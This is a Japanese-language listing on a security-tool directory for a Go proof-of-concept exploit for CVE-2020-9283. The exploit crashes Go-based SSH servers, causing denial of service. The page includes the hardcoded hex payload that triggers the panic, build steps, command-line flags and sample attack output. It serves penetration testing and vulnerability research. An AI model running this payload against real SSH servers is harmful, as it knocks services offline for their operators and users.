Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-9283 — GoベースのCVE-2020-9283用エクスプロイト | Kitploit
ツール/GitHubGitHub/brompwnie/cve-2020-9283
脆弱性分析エクスプロイトネットワークセキュリティペネトレーションテスト
GitHubbrompwnie/cve-2020-9283

CVE-2020-9283

GoベースのCVE-2020-9283用エクスプロイト

リポジトリを見る
51116年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-9283 のエクスプロイト

このプロジェクトは、github.com/mark-adams/exploits/CVE-2020-9283 にあるオリジナルの POC に触発されたものです。 Go の SSH ライブラリがどのように実装されているのか興味があったため、Go を使って PoC を実装することにしました。

短い解説記事はこちら: https://dev.to/brompwnie/modifying-go-s-crypto-ssh-library-for-cve-2020-9283-26a7

これは何をするのか?

Go ベースの SSH サーバー上でパニックを発生させ、DoS につながる可能性があります。

インストール

Release セクションでバイナリをリリースしていますが、添付のソースコードを使って自分で再ビルドすることもできます。

ソースコードのビルド

この仕組みを理解するために、自分のシステム上の Go crypto ライブラリを直接変更することにしました。これは理想的な方法ではなく、おそらく最善のやり方でもありませんが、動作はします ;) GO モジュールを使って再ビルドしたい場合は、ローカルシステム上の Crypto/ssh ファイル client_auth.go、handshake.go、transport.go の内容を、ここにある ".bak" ファイルに置き換えてください。これらの変更されたファイルには、詳細なデバッグ出力と、パニックを引き起こすハードコードされたペイロード "0000000b7373682d65643235353139000000156161612d616161612d61612d6161612d6161616161" が含まれています。

使い方

大量のデバッグ出力と「エラー」が表示されますが、これは想定どおりです。ターゲットがパニックを起こした場合は、"bad key lengths" に関連するエラーが表示されるはずです。ローカルでテストしたい場合は、github.com/mark-adams/exploits/CVE-2020-9283 にある脆弱なコードを使用してください。

root@kitploit:~
# ./CVE-2020-9283 -h
Usage of ./CVE-2020-9283:
  -host string
        IP address of SSH host to target (default "localhost")
  -key string
        ssh-ed25519 private key to use (default "thekey")
  -port string
        Port to target (default "22")

# ./CVE-2020-9283 -port=2022
./CVE-2020-9283 -port=2022
+] Sploit for CVE-2020-9283
[+] Attempting to pwn: localhost:2022
[!] Attempting: cMSG_USERAUTH_REQUEST
[+] userAuthRequestMsg User:  notme
[+] userAuthRequestMsg Service:  ssh-connection
[ERROR] ssh: handshake failed: EOF
[+] This should have invoked a panic on the SSH target i.e 'panic: ed25519: bad public key length'

ツールをダウンロード